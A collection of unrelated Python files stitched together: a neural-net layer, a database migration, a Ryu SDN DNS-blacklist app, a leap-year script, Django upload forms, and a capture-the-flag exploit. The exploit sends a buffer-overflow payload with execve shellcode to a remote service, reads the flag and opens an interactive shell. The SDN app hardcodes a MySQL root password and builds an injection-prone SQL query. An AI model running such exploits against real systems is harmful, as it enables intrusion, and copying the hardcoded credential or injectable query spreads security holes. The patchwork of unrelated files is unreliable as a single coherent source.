        if self.options.get("combined") and self.perturbed_flag:
            # NOTE(review): the "combined" path is unimplemented; with this
            # option enabled and the flag set, forward falls through and
            # returns None — confirm whether it should raise instead.
            pass
        else:
            unperturbed = F.conv2d(input, self.weight, self.bias, self.stride,
                                   padding, self.dilation, self.groups)
            if self.perturbed_flag:
                input_dims = input.shape[-2:]
                output_dims = unperturbed.shape[-2:]
                input_view = input.view(-1, self.directions, self.in_channels, *input_dims)
                repeat_size = input_view.size(0)
                # Flip input channel signs per direction, convolve with the
                # shared noise kernel, then flip output channel signs.
                flipped_input = input_view * self.input_flips.unsqueeze(2).unsqueeze(3) if self.flip_inputs else input_view
                perturbations = F.conv2d(flipped_input.view(-1, self.in_sparsity, *input_dims), self.weight_noise, None, self.stride,
                                         padding, self.dilation, self.groups)
                flipped_output = (perturbations * self.output_flips.unsqueeze(2).unsqueeze(3) if self.flip_outputs else perturbations)
                if self.bias is not None:
                    flipped_output += self.bias_noise.unsqueeze(-1).unsqueeze(-1)
                if self.antithetic:
                    flipped_output.view(repeat_size, -1)[(repeat_size + 1) // 2:] *= -1
                add = unperturbed + flipped_output
                return add
            return unperturbed
|
"""is_visible and is_required for Action model
Revision ID: 14b482ad5574
Revises: 333833cebe88
Create Date: 2015-01-22 12:24:56.428785
"""
# revision identifiers, used by Alembic.
revision = '14b482ad5574'
down_revision = '333833cebe88'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Replace action.action_type with is_required / is_visible flags."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('action', sa.Column('is_required', sa.Boolean(), nullable=True))
    op.add_column('action', sa.Column('is_visible', sa.Boolean(), nullable=True))
    op.drop_column('action', 'action_type')
    ### end Alembic commands ###
def downgrade():
    """Restore action.action_type and drop the boolean flags."""
    ### commands auto generated by Alembic - please adjust! ###
    # NOTE(review): re-adding a NOT NULL column without a server_default
    # will fail if the action table contains rows — confirm before running
    # this downgrade against populated databases.
    op.add_column('action', sa.Column('action_type', sa.VARCHAR(length=255), autoincrement=False, nullable=False))
    op.drop_column('action', 'is_visible')
    op.drop_column('action', 'is_required')
    ### end Alembic commands ###
|
# Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ipv4
from ryu.lib.packet import tcp
from ryu.lib.packet import udp
from ryu.ofproto import inet
from ryu.ofproto import ether
from ryu import utils
import binascii
from dnslib.dns import DNSRecord
import MySQLdb
#WEB_lacklist = ["www.taobao.com", "www.icbc.com.cn"]
class SimpleSwitch13(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
    def __init__(self, *args, **kwargs):
        """Initialize the app with an empty MAC-learning table."""
        super(SimpleSwitch13, self).__init__(*args, **kwargs)
        # dpid -> {mac -> in_port}, populated by _forwarding.
        self.mac_to_port = {}
    @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
    def switch_features_handler(self, ev):
        """On switch connect, install the two-table pipeline: table 0 sends
        DNS requests (UDP dst port 53) to the controller and everything
        else to table 1, which holds the normal table-miss entry."""
        datapath = ev.msg.datapath
        ofproto = datapath.ofproto
        parser = datapath.ofproto_parser
        # add goto-table-1 flow entry on table 0 (matches everything)
        match = parser.OFPMatch()
        inst = [parser.OFPInstructionGotoTable(table_id=1)]
        self.add_flow(datapath, 0, match, table_id=0, inst=inst)
        # install table-miss flow entry on table 1 (reuses the empty match)
        actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
                                          ofproto.OFPCML_NO_BUFFER)]
        self.add_flow(datapath, 0, match, actions, table_id=1)
        # install udp_dst_port 53 flow entry on table 0 to steer DNS request
        # packets to the controller.
        match = parser.OFPMatch(
            eth_type=ether.ETH_TYPE_IP, ip_proto=inet.IPPROTO_UDP, udp_dst=53)
        self.add_flow(datapath, 10, match, actions, table_id=0)
def add_flow(self, datapath, priority, match, actions=[], table_id=0,
idle_timeout=0, hard_timeout=0, buffer_id=None, inst=None):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
if not inst:
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
actions)]
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath, table_id=table_id, idle_timeout=idle_timeout, hard_timeout=hard_timeout,
buffer_id=buffer_id, priority=priority, match=match, instructions=inst)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority, table_id=table_id, idle_timeout=idle_timeout,
hard_timeout=hard_timeout, match=match, instructions=inst)
datapath.send_msg(mod)
    @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
    def _packet_in_handler(self, ev):
        """Dispatch packet-ins: DNS requests (UDP dst 53) go through the
        blacklist check, other UDP packets are L2-forwarded."""
        # If you hit this you might want to increase
        # the "miss_send_length" of your switch
        if ev.msg.msg_len < ev.msg.total_len:
            self.logger.debug("packet truncated: only %s of %s bytes",
                              ev.msg.msg_len, ev.msg.total_len)
        msg = ev.msg
        datapath = msg.datapath
        ofproto = datapath.ofproto
        parser = datapath.ofproto_parser
        pkt = packet.Packet(msg.data)
        eth = pkt.get_protocols(ethernet.ethernet)[0]
        # judge "DNS packet"
        pkt_ipv4 = pkt.get_protocol(ipv4.ipv4)
        if pkt_ipv4:
            if(pkt_ipv4.proto == inet.IPPROTO_UDP):
                pkt_udp = pkt.get_protocol(udp.udp)
                if 53 == pkt_udp.dst_port:
                    print " DNS request:dst_prot", pkt_udp.dst_port
                    self._badWeb_Potect(datapath, msg)
                else:
                    self._forwarding(datapath, msg)
        # NOTE(review): non-IPv4 and non-UDP IPv4 packets fall through with
        # no forwarding call (effectively dropped) — confirm intended.
    # bad web judge and protection
    def _badWeb_Potect(self, datapath, msg):
        """Extract the queried domain name from a DNS request and forward
        the packet only if the name is not in the WEB_lacklist table."""
        print "in _badWeb_Potect"
        ofproto = datapath.ofproto
        parser = datapath.ofproto_parser
        pkt = packet.Packet(msg.data)
        # Rebuild a plain hex string from ryu's "0x.." space-separated dump,
        # zero-padding single-digit bytes.
        hdata = utils.hex_array(msg.data)
        hdata = hdata.split(' ')
        hex_data = ''
        for hexdata in hdata:
            cc = hexdata.replace('0x', '')
            if len(cc) == 1:
                cc = '0%s' % cc
            hex_data = hex_data + cc
        # Skip the first 42 bytes (84 hex chars) to reach the DNS payload.
        # NOTE(review): this assumes untagged Ethernet + 20-byte IPv4 header
        # + UDP — confirm for VLAN-tagged or IP-options traffic.
        hex_dnsdata = hex_data[84:]
        dns_binary = binascii.unhexlify(hex_dnsdata)
        dns = DNSRecord.parse(dns_binary)
        dns  # NOTE(review): no-op statement, likely a debugging leftover
        # Join the qname labels into a dotted domain name.
        web_name = dns.questions[0].get_qname().label
        web_name = ".".join(list(web_name))
        try:
            conn = MySQLdb.connect(
                host='localhost', user='root', passwd='123456', db='web', port=3306)
            cur = conn.cursor()
            # NOTE(review): string-formatted SQL is injection-prone; prefer a
            # parameterized query, e.g. cur.execute(sql, (web_name,)).
            select = 'select * from WEB_lacklist where name="%s"' % web_name
            if(cur.execute(select)):
                # Name found in the blacklist: drop (do not forward).
                print ' ilegal web "%s", it`s dangerous! you can`t to access it.' % web_name
                cur.close()
                conn.close()
                return
            else:
                print 'legal web "%s",you can access it.' % web_name
                cur.close()
                conn.close()
                self._forwarding(datapath, msg)
        except MySQLdb.Error, e:
            print "Mysql Error %d: %s" % (e.args[0], e.args[1])
def _forwarding(self, datapath, msg):
    # Standard L2 learning-switch forwarding (as in Ryu simple_switch_13):
    # learn the source MAC, choose the output port, install a table-1 flow
    # for known destinations, and packet-out the current frame.
    print "in _forwarding..."
    datapath = msg.datapath
    ofproto = datapath.ofproto
    parser = datapath.ofproto_parser
    in_port = msg.match['in_port']
    pkt = packet.Packet(msg.data)
    eth = pkt.get_protocols(ethernet.ethernet)[0]
    dst = eth.dst
    src = eth.src
    dpid = datapath.id
    self.mac_to_port.setdefault(dpid, {})
    # learn a mac address to avoid FLOOD next time.
    self.mac_to_port[dpid][src] = in_port
    if dst in self.mac_to_port[dpid]:
        out_port = self.mac_to_port[dpid][dst]
    else:
        out_port = ofproto.OFPP_FLOOD
    actions = [parser.OFPActionOutput(out_port)]
    # install a flow to avoid packet_in next time
    if out_port != ofproto.OFPP_FLOOD:
        match = parser.OFPMatch(in_port=in_port, eth_dst=dst)
        # verify if we have a valid buffer_id, if yes avoid to send both
        # flow_mod & packet_out
        if msg.buffer_id != ofproto.OFP_NO_BUFFER:
            self.add_flow(datapath, 1, match, actions,
                          idle_timeout=10, hard_timeout=10, table_id=1, buffer_id=msg.buffer_id)
        else:
            self.add_flow(datapath, 1, match, actions, idle_timeout=10, table_id=1,
                          hard_timeout=10)
    data = None
    if msg.buffer_id == ofproto.OFP_NO_BUFFER:
        data = msg.data
    # Packet-out only when flooding or when the switch did not buffer the
    # packet; a buffered flow-mod above already releases the packet.
    if (out_port == ofproto.OFPP_FLOOD) or (msg.buffer_id == ofproto.OFP_NO_BUFFER):
        out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,
                                  in_port=in_port, actions=actions, data=data)
        datapath.send_msg(out)
|
def is_leap(year):
    """Return True for a Gregorian leap year.

    BUG FIX: the original tested only year % 4 (missing the century
    rules: 1900 is not a leap year, 2000 is) and its final 'else' branch
    was unreachable because the elif condition was the exact negation.
    """
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)


def main():
    # Portable input shim: raw_input on Python 2, input on Python 3.
    try:
        read_line = raw_input
    except NameError:
        read_line = input
    year = int(read_line("Enter any year...\n"))
    if is_leap(year):
        print("This is a leap year")
    else:
        print("This is not a leap year")


if __name__ == "__main__":
    main()
def classify_orfs_cmd():
    """Command-line entry point: will parse argv and call classify_orfs().

    Placeholder — not implemented yet.
    """
    # This function will parse cmd input with argparse and run classify_orfs
    pass
def classify_orfs():
    """Classify ORFs.  Placeholder — not implemented yet."""
    pass
|
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.template.defaultfilters import filesizeformat
from django.conf import settings
class ImpactClassForm(forms.Form):
    """Upload form for the impact-class CSV file."""
    impact_class_file = forms.FileField(
        label="",
        help_text="Must be a .csv file.",
    )
    def clean_impact_class_file(self):
        """Validate extension/content type and enforce the size limit."""
        the_file = self.cleaned_data['impact_class_file']
        # NOTE(review): assumes content_type contains '/' (e.g. 'text/csv');
        # a bare type string would raise IndexError here.
        content_type = the_file.content_type.split('/')[1]
        # _size is a private UploadedFile attribute; .size is the public API.
        size = the_file._size
        filename = the_file.name
        print 'DEBUG filename = %s' % filename
        print 'DEBUG content_type = %s' % content_type
        # NOTE(review): OR means a non-.csv name passes if its content type
        # is whitelisted — confirm this is intended.
        if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
            if size > settings.MAX_UPLOAD_SIZE:
                raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
        else:
            raise forms.ValidationError(_('File type is not supported.'))
        return the_file
class AggregateForm(forms.Form):
    """Upload form for the aggregate CSV file."""
    aggregate_file = forms.FileField(
        label="",
        help_text="Must be a .csv file.",
    )
    def clean_aggregate_file(self):
        """Validate extension/content type and enforce the size limit."""
        the_file = self.cleaned_data['aggregate_file']
        content_type = the_file.content_type.split('/')[1]
        # _size is a private UploadedFile attribute; .size is the public API.
        size = the_file._size
        filename = the_file.name
        print 'DEBUG filename = %s' % filename
        print 'DEBUG content_type = %s' % content_type
        if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
            if size > settings.MAX_UPLOAD_SIZE:
                raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
        else:
            raise forms.ValidationError(_('File type is not supported.'))
        return the_file
class AssumptionsDamageForm(forms.Form):
    """Upload form for the damage-assumptions CSV file."""
    assumptions_damage_file = forms.FileField(
        label="",
        help_text="Must be a .csv file.",
    )
    def clean_assumptions_damage_file(self):
        """Validate extension/content type and enforce the size limit."""
        the_file = self.cleaned_data['assumptions_damage_file']
        content_type = the_file.content_type.split('/')[1]
        # _size is a private UploadedFile attribute; .size is the public API.
        size = the_file._size
        filename = the_file.name
        print 'DEBUG filename = %s' % filename
        print 'DEBUG content_type = %s' % content_type
        if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
            if size > settings.MAX_UPLOAD_SIZE:
                raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
        else:
            raise forms.ValidationError(_('File type is not supported.'))
        return the_file
class AssumptionsLossForm(forms.Form):
    """Upload form for the loss-assumptions CSV file."""
    assumptions_loss_file = forms.FileField(
        label="",
        help_text="Must be a .csv file.",
    )
    def clean_assumptions_loss_file(self):
        """Validate extension/content type and enforce the size limit."""
        the_file = self.cleaned_data['assumptions_loss_file']
        content_type = the_file.content_type.split('/')[1]
        # _size is a private UploadedFile attribute; .size is the public API.
        size = the_file._size
        filename = the_file.name
        print 'DEBUG filename = %s' % filename
        print 'DEBUG content_type = %s' % content_type
        if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
            if size > settings.MAX_UPLOAD_SIZE:
                raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
        else:
            raise forms.ValidationError(_('File type is not supported.'))
        return the_file
class AssumptionsAggregateForm(forms.Form):
    """Upload form for the aggregate-assumptions CSV file."""
    assumptions_aggregate_file = forms.FileField(
        label="",
        help_text="Must be a .csv file.",
    )
    def clean_assumptions_aggregate_file(self):
        """Validate extension/content type and enforce the size limit."""
        the_file = self.cleaned_data['assumptions_aggregate_file']
        content_type = the_file.content_type.split('/')[1]
        # _size is a private UploadedFile attribute; .size is the public API.
        size = the_file._size
        filename = the_file.name
        print 'DEBUG filename = %s' % filename
        print 'DEBUG content_type = %s' % content_type
        if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
            if size > settings.MAX_UPLOAD_SIZE:
                raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
        else:
            raise forms.ValidationError(_('File type is not supported.'))
        return the_file
class AssumptionsInsuranceForm(forms.Form):
    """Upload form for the insurance-assumptions CSV file."""
    assumptions_insurance_file = forms.FileField(
        label="",
        help_text="Must be a .csv file.",
    )
    def clean_assumptions_insurance_file(self):
        """Validate extension/content type and enforce the size limit."""
        the_file = self.cleaned_data['assumptions_insurance_file']
        content_type = the_file.content_type.split('/')[1]
        # _size is a private UploadedFile attribute; .size is the public API.
        size = the_file._size
        filename = the_file.name
        print 'DEBUG filename = %s' % filename
        print 'DEBUG content_type = %s' % content_type
        if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
            if size > settings.MAX_UPLOAD_SIZE:
                raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
        else:
            raise forms.ValidationError(_('File type is not supported.'))
        return the_file
class AssumptionsInsurancePenetrationForm(forms.Form):
    """Upload form for the insurance-penetration-assumptions CSV file."""
    assumptions_insurance_penetration_file = forms.FileField(
        label="",
        help_text="Must be a .csv file.",
    )
    def clean_assumptions_insurance_penetration_file(self):
        """Validate extension/content type and enforce the size limit."""
        the_file = self.cleaned_data['assumptions_insurance_penetration_file']
        content_type = the_file.content_type.split('/')[1]
        # _size is a private UploadedFile attribute; .size is the public API.
        size = the_file._size
        filename = the_file.name
        print 'DEBUG filename = %s' % filename
        print 'DEBUG content_type = %s' % content_type
        if filename.lower().endswith('.csv') or content_type in settings.CONTENT_TYPES:
            if size > settings.MAX_UPLOAD_SIZE:
                raise forms.ValidationError(_("File size is over %s. Current file size %s.") % (filesizeformat(settings.MAX_UPLOAD_SIZE), filesizeformat(size)))
        else:
            raise forms.ValidationError(_('File type is not supported.'))
        return the_file
class BoundaryForm(forms.Form):
    """Upload form for the five companion files of a boundary shapefile."""
    boundary_shp_file = forms.FileField(
        label="",
        help_text="Must be a .shp file",
    )
    boundary_shx_file = forms.FileField(
        label="",
        help_text="Must be a .shx file",
    )
    boundary_dbf_file = forms.FileField(
        label="",
        help_text="Must be a .dbf file",
    )
    boundary_prj_file = forms.FileField(
        label="",
        help_text="Must be a .prj file",
    )
    boundary_qpj_file = forms.FileField(
        label="",
        help_text="Must be a .qpj file",
    )
    def clean(self):
        """Cross-field validation: each upload must carry the matching extension."""
        boundary_shp_file = self.cleaned_data.get('boundary_shp_file')
        boundary_shx_file = self.cleaned_data.get('boundary_shx_file')
        boundary_dbf_file = self.cleaned_data.get('boundary_dbf_file')
        boundary_prj_file = self.cleaned_data.get('boundary_prj_file')
        boundary_qpj_file = self.cleaned_data.get('boundary_qpj_file')
        # NOTE(review): missing uploads come back as None, never False, so
        # these `== False` comparisons can never trigger — confirm intent.
        if (boundary_shp_file == False or boundary_shx_file == False or boundary_dbf_file == False or boundary_prj_file == False or boundary_qpj_file == False):
            raise forms.ValidationError(_('Upload file not found.'))
        if boundary_shp_file:
            filename = boundary_shp_file.name
            content_type = boundary_shp_file.content_type.split('/')[1]
            # _size is a private UploadedFile attribute; .size is the public API.
            size = boundary_shp_file._size
            if (filename.lower().endswith('.shp') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if boundary_shx_file:
            filename = boundary_shx_file.name
            content_type = boundary_shx_file.content_type.split('/')[1]
            size = boundary_shx_file._size
            if (filename.lower().endswith('.shx') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if boundary_dbf_file:
            filename = boundary_dbf_file.name
            content_type = boundary_dbf_file.content_type.split('/')[1]
            size = boundary_dbf_file._size
            if (filename.lower().endswith('.dbf') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if boundary_prj_file:
            filename = boundary_prj_file.name
            content_type = boundary_prj_file.content_type.split('/')[1]
            size = boundary_prj_file._size
            if (filename.lower().endswith('.prj') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if boundary_qpj_file:
            filename = boundary_qpj_file.name
            content_type = boundary_qpj_file.content_type.split('/')[1]
            size = boundary_qpj_file._size
            if (filename.lower().endswith('.qpj') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
class BuildingExposureForm(forms.Form):
    """Upload form for the five companion files of a building-exposure shapefile."""
    building_exposure_shp_file = forms.FileField(
        label="",
        help_text="Must be a .shp file",
    )
    building_exposure_shx_file = forms.FileField(
        label="",
        help_text="Must be a .shx file",
    )
    building_exposure_dbf_file = forms.FileField(
        label="",
        help_text="Must be a .dbf file",
    )
    building_exposure_prj_file = forms.FileField(
        label="",
        help_text="Must be a .prj file",
    )
    building_exposure_qpj_file = forms.FileField(
        label="",
        help_text="Must be a .qpj file",
    )
    def clean(self):
        """Cross-field validation: each upload must carry the matching extension."""
        building_exposure_shp_file = self.cleaned_data.get('building_exposure_shp_file')
        building_exposure_shx_file = self.cleaned_data.get('building_exposure_shx_file')
        building_exposure_dbf_file = self.cleaned_data.get('building_exposure_dbf_file')
        building_exposure_prj_file = self.cleaned_data.get('building_exposure_prj_file')
        building_exposure_qpj_file = self.cleaned_data.get('building_exposure_qpj_file')
        # NOTE(review): missing uploads come back as None, never False, so
        # these `== False` comparisons can never trigger — confirm intent.
        if (building_exposure_shp_file == False or building_exposure_shx_file == False or building_exposure_dbf_file == False or building_exposure_prj_file == False or building_exposure_qpj_file == False):
            raise forms.ValidationError(_('Upload file not found.'))
        if building_exposure_shp_file:
            filename = building_exposure_shp_file.name
            content_type = building_exposure_shp_file.content_type.split('/')[1]
            # _size is a private UploadedFile attribute; .size is the public API.
            size = building_exposure_shp_file._size
            if (filename.lower().endswith('.shp') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if building_exposure_shx_file:
            filename = building_exposure_shx_file.name
            content_type = building_exposure_shx_file.content_type.split('/')[1]
            size = building_exposure_shx_file._size
            if (filename.lower().endswith('.shx') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if building_exposure_dbf_file:
            filename = building_exposure_dbf_file.name
            content_type = building_exposure_dbf_file.content_type.split('/')[1]
            size = building_exposure_dbf_file._size
            if (filename.lower().endswith('.dbf') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if building_exposure_prj_file:
            filename = building_exposure_prj_file.name
            content_type = building_exposure_prj_file.content_type.split('/')[1]
            size = building_exposure_prj_file._size
            if (filename.lower().endswith('.prj') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if building_exposure_qpj_file:
            filename = building_exposure_qpj_file.name
            content_type = building_exposure_qpj_file.content_type.split('/')[1]
            size = building_exposure_qpj_file._size
            if (filename.lower().endswith('.qpj') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
class RoadExposureForm(forms.Form):
    """Upload form for the five companion files of a road-exposure shapefile."""
    road_exposure_shp_file = forms.FileField(
        label="",
        help_text="Must be a .shp file",
    )
    road_exposure_shx_file = forms.FileField(
        label="",
        help_text="Must be a .shx file",
    )
    road_exposure_dbf_file = forms.FileField(
        label="",
        help_text="Must be a .dbf file",
    )
    road_exposure_prj_file = forms.FileField(
        label="",
        help_text="Must be a .prj file",
    )
    road_exposure_qpj_file = forms.FileField(
        label="",
        help_text="Must be a .qpj file",
    )
    def clean(self):
        """Cross-field validation: each upload must carry the matching extension."""
        road_exposure_shp_file = self.cleaned_data.get('road_exposure_shp_file')
        road_exposure_shx_file = self.cleaned_data.get('road_exposure_shx_file')
        road_exposure_dbf_file = self.cleaned_data.get('road_exposure_dbf_file')
        road_exposure_prj_file = self.cleaned_data.get('road_exposure_prj_file')
        road_exposure_qpj_file = self.cleaned_data.get('road_exposure_qpj_file')
        # NOTE(review): missing uploads come back as None, never False, so
        # these `== False` comparisons can never trigger — confirm intent.
        if (road_exposure_shp_file == False or road_exposure_shx_file == False or road_exposure_dbf_file == False or road_exposure_prj_file == False or road_exposure_qpj_file == False):
            raise forms.ValidationError(_('Upload file not found.'))
        if road_exposure_shp_file:
            filename = road_exposure_shp_file.name
            content_type = road_exposure_shp_file.content_type.split('/')[1]
            # _size is a private UploadedFile attribute; .size is the public API.
            size = road_exposure_shp_file._size
            if (filename.lower().endswith('.shp') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if road_exposure_shx_file:
            filename = road_exposure_shx_file.name
            content_type = road_exposure_shx_file.content_type.split('/')[1]
            size = road_exposure_shx_file._size
            if (filename.lower().endswith('.shx') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if road_exposure_dbf_file:
            filename = road_exposure_dbf_file.name
            content_type = road_exposure_dbf_file.content_type.split('/')[1]
            size = road_exposure_dbf_file._size
            if (filename.lower().endswith('.dbf') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if road_exposure_prj_file:
            filename = road_exposure_prj_file.name
            content_type = road_exposure_prj_file.content_type.split('/')[1]
            size = road_exposure_prj_file._size
            if (filename.lower().endswith('.prj') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        if road_exposure_qpj_file:
            filename = road_exposure_qpj_file.name
            content_type = road_exposure_qpj_file.content_type.split('/')[1]
            size = road_exposure_qpj_file._size
            if (filename.lower().endswith('.qpj') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
class GlobalConfigForm(forms.Form):
    """Upload form for the global configuration (.cfg) file."""
    global_config_file = forms.FileField(
        label="",
        help_text="Must be a .cfg file.",
    )
    def clean_global_config_file(self):
        """Require a .cfg extension on the uploaded file."""
        the_file = self.cleaned_data['global_config_file']
        # NOTE(review): a missing upload surfaces as None (not False), so
        # this branch is effectively dead — confirm intent.
        if (the_file == False):
            raise forms.ValidationError(_('Upload file not found.'))
        else:
            filename = the_file.name
            content_type = the_file.content_type.split('/')[1]
            # _size is a private UploadedFile attribute; .size is the public API.
            size = the_file._size
            if (filename.lower().endswith('.cfg') == False):
                print 'DEBUG invalid file type'
                raise forms.ValidationError(_('Invalid file type.'))
            print 'DEBUG %s %s %s' % (filename, content_type, size)
        return the_file
#!/usr/bin/env python3
"""
diff -u neophyte1.jav neophyte2.jav
--- neophyte1.jav 2016-08-05 19:09:09.935916641 -0700
+++ neophyte2.jav 2016-08-05 19:39:34.523799711 -0700
@@ -163,12 +163,12 @@
vulnerable:
804852f: PUSH EBP
8048530: MOV EBP, ESP ; EBP = ESP;
- 8048532: SUB ESP, 0x3db8 ; ESP -= 0x3db8;
+ 8048532: SUB ESP, 0xea8 ; ESP -= 0xea8;
8048538: MOV EAX, [0x804a040] ; EAX = [0x804a040];
804853d: SUB ESP, 0x4 ; ESP -= 0x4;
8048540: PUSH EAX
- 8048541: PUSH DWORD 0x41a4
- 8048546: LEA EAX, [EBP-0x3dac]
+ 8048541: PUSH DWORD 0x129c
+ 8048546: LEA EAX, [EBP-0xea4]
804854c: PUSH EAX
804854d: CALL 80483d0 <fgets>
8048552: ADD ESP, 0x10 ; ESP += 0x10;
@@ -201,8 +201,8 @@
80485a0: ADD ESP, 0x10 ; ESP += 0x10;
80485a3: CALL 80483c0 <getchar>
80485a8: MOV [EBP-0x9], AL ; [EBP-0x9] = AL;
- 80485ab: CMP BYTE [EBP-0x9], 0x6b ;
- 80485af: JNZ 0x80485c8 ; if(BYTE [EBP-0x9] == 0x6b) {
+ 80485ab: CMP BYTE [EBP-0x9], 0x75 ;
+ 80485af: JNZ 0x80485c8 ; if(BYTE [EBP-0x9] == 0x75) {
80485b1: SUB ESP, 0xc ; ESP -= 0xc;
80485b4: PUSH DWORD 0x8048670 ; 'good gatekeeper'
80485b9: CALL 80483f0 <puts>
for i in $(seq 1 200); do echo 'new'; python3 neophyte1.py; done >gg3.txt
grep -A2 success gg3.txt
"""
import struct
import socket
import telnetlib
HOST, PORT = '172.31.1.46', 1622
# From HBW's exploit, I hope it works.
# x86 execve("/bin//sh") shellcode.
sc = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
varcmp = b'k'
#subesp = 0x3db8
sublea = 0x3dac
stackptr = 0xffb107f0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# The service first sends its own (randomized) ELF; keep reading until all
# 7747 expected bytes have arrived so constants can be extracted below.
q = s.recv(8000)
q1 = q
#if b'\x7fELF' not in q:
while len(q) < 7747:
    print('fail1', q1)
    if q1 == b'': exit(1)
    q1 = s.recv(8000)
    q += q1
#end if
elf = q[q.index(b'\x7fELF'):]
# Gate byte the binary compares against (file offset 0x5ae) and the buffer
# offset used by the LEA (two's complement of the 16-bit immediate at 0x548)
# — see the disassembly diff in the module docstring.
varcmp = elf[0x5ae:0x5af]
#subesp = struct.unpack('<H', elf[0x534:0x536])[0]
sublea = 0x10000 - struct.unpack('<H', elf[0x548:0x54a])[0]
#print('varcmp', varcmp, 'subesp', hex(subesp))
print('varcmp', varcmp, 'sublea', hex(sublea))
# Works every time
addr = 0x80485cb
# Works 1 in 150 times.
addr = 0xffff948c
#a = varcmp + (b'\x90'*(subesp-8-len(sc))) + sc + struct.pack('<I', stackptr-subesp) + b'\n'
#a = varcmp + (b'\x90'*(subesp-8-len(sc))) + sc + struct.pack('<I', addr) + b'\n'
# Payload: gate byte + NOP sled + shellcode + 50 NOPs + saved-EIP overwrite.
a = varcmp + (b'\x90'*(sublea+4-len(sc)-50)) + sc + (b'\x90'*50) + struct.pack('<I', addr) + b'\n'
s.send(a)
print('resp', s.recv(1024))
s.send(b'cat /home/challenge/flag\n')
s.send(b'pwd\n')
print('resp success', s.recv(1024))
print("shell:")
# Hand the raw socket to telnetlib for an interactive shell session.
ts = telnetlib.Telnet()
ts.sock = s
ts.interact()
s.close()
|
import numpy as np
import pandas as pd
from sklearn.cluster import KMeans
